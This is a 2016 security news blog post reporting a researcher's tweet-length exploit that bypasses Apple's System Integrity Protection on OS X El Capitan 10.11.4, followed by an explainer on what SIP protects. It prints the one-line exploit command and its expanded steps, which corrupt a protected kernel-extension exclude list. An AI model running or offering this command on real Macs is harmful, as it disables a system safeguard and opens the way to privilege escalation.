Saturday, 2 April 2016

Here's the Exploit to Bypass Apple Security Feature that Fits in a Tweet

Here's Exploit to Bypass Apple Security Mechanism that Fits in a Tweet
Did you install the latest update OS X 10.11.4?

If yes, then you might be wondering with a fact that the Apple had delivered an ineffective patch update this time.

Yes! This news would definitely disappoint many Apple users, as the latest update of OS X El Capitan 10.11.4 and iOS 9.3 still contain a privilege escalation vulnerability that could affect 130 Million Apple customers.

Just last week, we reported about a critical privilege escalation vulnerability in Apple's popular System Integrity Protection (SIP) security mechanism, affecting all versions of OS X operating system.

Even after Apple had fixed the critical flaw in the latest round of patches for Macs and iThings, the SIP can still be bypassed in the most recent version of operating system, leaving Apple users vulnerable to flaws that could remotely hijack their machines.

SIP Bypass Exploit Code Fits in a Tweet


Interestingly, Stefan Esser, a security researcher from Germany, has released a new exploit code to bypass latest patched version of SIP application, which just fits in a Tweet.

Here's the exploit code -- It can be used to modify a crucial OS X configuration file that not even root user is allowed to touch, reported The Register.
ln -s /S*/*/E*/A*Li*/*/I* /dev/diskX;fsck_cs /dev/diskX 1>&-;touch /Li*/Ex*/;reboot
The above code actually expands to:
ln -s /System/Library/Extensions/AppleKextExcludeList.kext/Contents/Info.plist /dev/diskX
fsck_cs /dev/diskX 1>&-
touch /Library/Extensions/
Reboot
The above exploit code successfully bypasses Apple's SIP technology, allowing one to run processes as it is pleased.

What is System Integrity Protection (SIP)?


Apple introduced SIP, a security protection feature to the OS X kernel, with the release of OS X El Capitan, which is designed to restrict the root account of OS X machines and limit the actions a root user can perform on protected parts of the system.

Besides this, System Integrity Protection (SIP) also helps prevent software from changing your startup volume, blocks certain kernel extensions from being loaded and limits the debugging of certain apps.

System Integrity Protection or SIP, by default, protects these folders: /System, /usr, /bin, /sbin, along with applications that come pre-installed with OS X.

This is really a bad time for Apple and its users. Now, let's hope that the company would be more vigilant with its upcoming patch update.

No comments:

Post a Comment

Popular Posts